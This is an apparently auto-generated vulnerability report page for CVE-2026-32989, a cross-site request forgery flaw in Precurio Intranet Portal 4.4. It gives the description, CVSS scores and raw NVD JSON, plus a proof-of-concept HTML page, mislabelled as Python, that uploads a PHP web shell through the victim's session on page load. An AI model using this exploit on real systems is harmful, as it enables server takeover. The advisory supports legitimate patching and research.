Security Vulnerability Report
中文
CVE-2026-32989 CVSS 8.8 HIGH

CVE-2026-32989

Published: 2026-03-20 16:16:18
Last Modified: 2026-04-16 14:35:35

Description

Precurio Intranet Portal 4.4 contains a cross-site request forgery vulnerability that allows attackers to induce authenticated users to submit crafted requests to a profile update endpoint handling file uploads. Attackers can exploit this to upload executable files to web-accessible locations, leading to arbitrary code execution in the context of the web server.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:precurio:intranet_portal:4.4:*:*:*:*:*:*:* - VULNERABLE
Precurio Intranet Portal 4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-32989 --> <!-- This HTML page demonstrates the CSRF attack vector --> <html> <body> <script> function exploit() { // Target URL for the profile update endpoint var targetUrl = "http://target.com/precurio/index.php/profile/update"; // Create a FormData object to simulate the file upload var formData = new FormData(); // The malicious executable file (e.g., PHP shell) var blob = new Blob(["<?php system($_GET['cmd']); ?>"], { type: "application/x-php" }); formData.append("profile_pic", blob, "shell.php"); formData.append("update_action", "save"); var xhr = new XMLHttpRequest(); xhr.open("POST", targetUrl, true); // The browser automatically sends the session cookies xhr.withCredentials = true; xhr.onload = function () { if (xhr.readyState === 4) { console.log("File uploaded. Check /uploads/shell.php"); } }; xhr.send(formData); } // Auto-trigger the attack on page load window.onload = exploit; </script> <p>CVE-2026-32989 CSRF PoC running...</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32989", "sourceIdentifier": "[email protected]", "published": "2026-03-20T16:16:17.770", "lastModified": "2026-04-16T14:35:35.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Precurio Intranet Portal 4.4 contains a cross-site request forgery vulnerability that allows attackers to induce authenticated users to submit crafted requests to a profile update endpoint handling file uploads. Attackers can exploit this to upload executable files to web-accessible locations, leading to arbitrary code execution in the context of the web server."}, {"lang": "es", "value": "Precurio Intranet Portal 4.4 contiene una vulnerabilidad de falsificación de petición en sitios cruzados que permite a los atacantes inducir a usuarios autenticados a enviar peticiones manipuladas a un punto final de actualización de perfil que gestiona la carga de archivos. Los atacantes pueden explotar esto para cargar archivos ejecutables en ubicaciones accesibles desde la web, lo que lleva a la ejecución de código arbitrario en el contexto del servidor web."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:precurio:intranet_portal:4.4:*:*:*:*:*:*:*", "matchCriteriaId": "5C8C4115-1874-41F9-8390-068A9A7ED919"}]}]}], "references": [{"url": "https://www.packetstorm.news/files/id/215644/", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://www.precurio.com", "source": "[email protected]", "tags": ["Product"]}]}}